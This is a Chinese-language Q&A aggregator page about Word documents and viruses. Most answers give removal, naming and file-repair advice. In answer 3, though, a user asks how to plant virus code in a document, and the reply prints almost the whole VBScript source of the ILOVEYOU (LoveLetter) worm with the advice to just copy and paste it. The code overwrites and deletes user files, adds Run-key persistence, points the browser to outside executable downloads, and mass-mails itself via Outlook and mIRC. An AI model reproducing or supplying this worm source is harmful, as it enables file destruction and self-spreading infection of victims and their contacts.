word文檔植入病毒代碼_我的word文檔染上病毒了

1. 病毒是如何嵌入word文檔的又是如何進入U盤的

1 病毒通常只會感染軟盤或者U盤中的Word文檔，對硬碟中的Word文檔並不感染。

2 病毒會將軟盤或者U盤中的Word文檔刪除，並生成同名的EXE文件，圖標為Word文檔圖標，這具有很大的欺騙性，用戶通常會雙擊該文件，導致病毒程序執行。

3 病毒會修改注冊表以保證自身隨系統啟動，並生成病毒文件於系統文件夾（Win9x為windows\system；Win2000/xp為winnt/windows\system32），大小通常為32K，圖標為Word圖標。

解決辦法：

1 用最新的殺毒軟體查殺。

2 手動查殺。具體方法是查找上述系統文件夾中的具有Word文檔圖標且大小為32K的文件，刪除之，如果提示無法刪除，表明病毒正在運行，請按Alt+Ctrl+Del一次，這時病毒會結束自身，然後再刪除。接下來啟動Regedit（注冊表編輯器），查找該文件，並刪除查到的鍵值。（強烈建議先備份注冊表）最後重新啟動計算機。

3 除非必要，請將軟盤或者U盤的防寫打開，以免病毒感染。

2. win-Trojan是個什麼病毒啊

好像沒有病毒的資料，不知道是不是錯了，先看看病毒是怎樣命名的吧！！！
————————————————————————
國際上對病毒命名的一般慣例為前綴+病毒名+後綴。前綴表示該病毒發作的操作平台或者病毒的類型，而DOS下的病毒一般是沒有前綴的；病毒名為該病毒的名稱及其家族；後綴一般可以不要的，只是以此區別在該病毒家族中各病毒的不同，可以為字母，或者為數字以說明此病毒的大小。

例如：WM.Cap.A，A表示在Cap病毒家族中的一個變種，WM表示該病毒是一個Word宏病毒。下面就講解一下各種前綴的含義：

WM: Word宏病毒，可以在Word6.0和Word95(Word7.0)下傳播發作，也可以在Word97(Word8.0)或以上的Word下傳播發作，但該病毒不是在Word97製作完成的。

W97M: Word97宏病毒，這些是在Word97下製作完成，並只在Word97或以上版本的或以上的Word傳播發作。

XM: Excel宏病毒在Excel5.0和Excel95下製作完成並傳播發作，同樣，此種病毒也可以在Excel97或以上版本傳播發作。

X97M: 在Excel97下製作完成的Excel宏病毒，此類病毒也可以在Excel5.0和Excel97下傳播發作。

XF: Excel程式（Excel Formula）病毒，此類病毒是用Excel4.0把程序片斷植入新的Excel文檔中的。

AM: 在Access95下製作完成並傳播發作的Access的宏病毒。

A97M: 在Access97下製作完成並傳播發作的Access的宏病毒。

W95: 顧名思義，這類是Windows95病毒，運行在Windows95操作系統下，當然也可以運行在Windows98下。

Win: Windows3.x病毒，感染Windows3.x操作系統的文件。

W32: 32位Windows病毒，感染所有的32位Widnows平台。

WNT: 同樣是32位Windows病毒，但只感染Windows NT操作系統。

HLLC: 高級語言同伴（High Level Language Companion）病毒，他們通常是DOS病毒，通過新建一個附加的文件（同伴文件）來傳播。

HLLP: 高級語言寄生（High Level Language Parasitic）病毒，這些通常也是DOS病毒，寄生在主文件中。

HLLO: 高級語言改寫（High Level Language Overwriting）病毒，通常是DOS病毒，以病毒代碼改寫主文件。

Trojan/Troj: 這並不是病毒，只是特洛伊木馬，通常裝扮成有用的程序，但通常有惡意代碼，特洛伊木馬並不會傳染。

VBS: 用Visual Basic Script程序語言編寫的病毒。

AOL: 美國在線（AOL）環境下特殊的木馬，其目的通常位竊取AOL的密碼等信息。

PWSTEAL: 竊取密碼等信息的木馬。

JAVA: 用JAVA程序語言編寫的病毒。

3. 我想在文檔裡面插病毒代碼

:)
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [email protected] / @GRAMMERSoft Group
/ Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbs,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout")
if (rr>=1) then <-設置超時
wscr.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\\MSKernel32.vbs") <-復制文件
c.Copy(dirwin&"\\Win32DLL.vbs") <-復制文件

c.Copy(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",dirsystem&"\\MSKernel32.vbs"

regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL",dirwin&"\\Win32DLL.vbs"

downread=""
downread=regget("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Download Directory")
if (downread="") then
downread="c:\\"
end if
if (fileexist(dirsystem&"\\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~young1s//WIN-BUGSFIX.exe "

elseif num = 2 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~angelcat//WIN-BUGSFIX.exe "

elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~koichi//WIN-BUGSFIX.exe "

elseif num = 4 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~chu//WIN-BUGSFIX.exe "

end if
end if
if (fileexist(downread&"\\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WIN-BUGSFIX",downread&"\\WIN-BUGSFIX.exe"

regcreate
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Main\\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.(folderspec&"\\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
set cop=fso.GetFile(f1.path)
cop.(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbs
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set
scriptini=fso.CreateTextFile(folderspec&"\\script.ini")

scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine "; http://www.mirc.com "
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a)

if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead)

if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead,1,"REG_DWORD"

end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Count

else
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Count

end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -
HTML<?-?TITLE><META NAME=@- @ Generator@- @
CONTENT=@- @BAROK VBS - LOVELETTER@- @>"&vbcrlf& _
"<META NAME=@- @ Author@- @ CONTENT=@- @spyder ?-?
[email protected] ?-? @GRAMMERSoft Group ?-? Manila,
Philippines ?-? March 2000@- @>"&vbcrlf& _
"<META NAME=@- @ Description@- @ CONTENT=@- @simple but i
think this is good...@- @>"&vbcrlf& _
"<?-?HEAD><BODY
onmouseOUT=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
"&vbcrlf& _
" ONKEYDOWN=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@- @ fixed@- @
BGCOLOR=@- @ #FF9933@- @>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX
Control<?-?p><p>To Enable to read this HTML file<BR>-
Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@- @ infinite@- @
BGCOLOR=@- @ yellow@- @>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@- @ JScript@- @>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@- @ VBScript@- @>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"\'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"\'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"\'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\\",chr(37)+chr(45)+chr(37))

if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set
b=fso.CreateTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM")

b.close
set
d=fso.OpenTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM",2)

d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

大多數VBS腳本病毒都是以愛蟲病毒為模板刻畫出來的。
把上面的代碼復制粘貼進去就好了

4. 急求word宏病毒源代碼

許多VB的程序，就可以作為Word宏運行

不過，先學會用word宏寫出正確的程序再說吧！
不要老想著搞破壞。

5. word文檔被病毒加入文件如何處理

那就選中它殺毒啊!!

6. 我的word文檔染上病毒了,成了亂碼怎樣修復啊

一、「打開並修復」文件
Word
XP提供了一個恢復受損文檔的新方法，操作步驟如下：
1.在「文件」菜單上，單擊「打開」命令；
2.在「查找范圍」列表中，單擊包含要打開的文件的驅動器、文件夾或Internet位置；
3.在文件夾列表中，定位並打開包含文件的文件夾；
4.選擇要恢復的文件；
5.單擊「打開」按鈕旁邊的箭頭，然後單擊「打開並修復」。
二、從任意文件中恢復文本
Word提供了一個「從任意文件中恢復文本」的文件轉換器，可以用來從任意文件中提取文字。要使用該文件轉換器恢復損壞文件中的文本，操作步驟如下：
1.在「工具」菜單上，單擊「選項」命令，再單擊「常規」選項卡；
2.確認選中「打開時確認轉換」復選框，單擊「確定」按鈕；
3.在「文件」菜單上，單擊「打開」命令；
4.在「文件類型」框中，單擊「從任意文件中恢復文本」。如果在「文件類型」框中沒有看到「從任意文件中恢復文本」，則需要安裝相應的文件轉換器。安裝方法不做贅述；
5.像通常一樣打開文檔。
此時，系統會彈出「轉換文件」對話框，請選擇的需要的文件格式。當然，如果要從受損Word文檔中恢復文字，請選擇「純文本」，單擊「確定」按扭。不過，選擇了「純文本」，方式打開文檔後，僅能恢復文檔中的普通文字，原文檔中的圖片對象將丟失，頁眉頁腳等非文本信息變為普通文字。

7. 怎樣用WORD製作「宏病毒」

宏病毒就是也是一些vba代碼，但是調用了系統提供的api函數，所以就用許可權做一些操作系統級別的事情，可能會有破壞作用
要知道怎麼做，你得先去研究好哈vba代碼怎麼寫

8. 一個word文檔里有病毒，新建一個word文檔，復制粘貼其中內容，會染上病毒嗎

你好，對於你的問題：
1、word文檔如果被感染病毒的話，一般來說以宏病毒居多
2、簡單說一下宏病毒的感染原理：用戶打開被感染宏病毒的word文檔，宏病毒會自動運行並駐留在word軟體的Normal模板上，這樣你以後只要新建或打開保存任何word文檔，都會被感染宏病毒
3、所以，如果你的計算機感染了宏病毒，你對word文檔執行的任何操作只要一經保存就會成為帶毒文件
4、單純的從word文檔中復制文字內容到純文本編輯器的操作不會感染病毒
5、所以，建議你立即使用殺毒軟體清理當前計算機中的病毒
6、平時使用時，因為普通用戶使用宏功能的機會不多，建議關閉宏功能，防止感染宏病毒

PS：如果你的word文檔只是感染了一般病毒，則不會出現上述情況，但是保險起見，請立即殺毒！
有其他問題歡迎到電腦管家企業平台咨詢，我們將竭誠為您服務！

9. word文件好像帶病毒了，怎麼辦

要看是什麼殺毒軟體.
一般的殺毒軟體把毒文件臨時隔離到一個目錄下,不會立刻刪除.自己到殺毒軟體里查找吧.

導航:首頁 > 編程語言 > word文檔植入病毒代碼

word文檔植入病毒代碼

與word文檔植入病毒代碼相關的資料

友情鏈接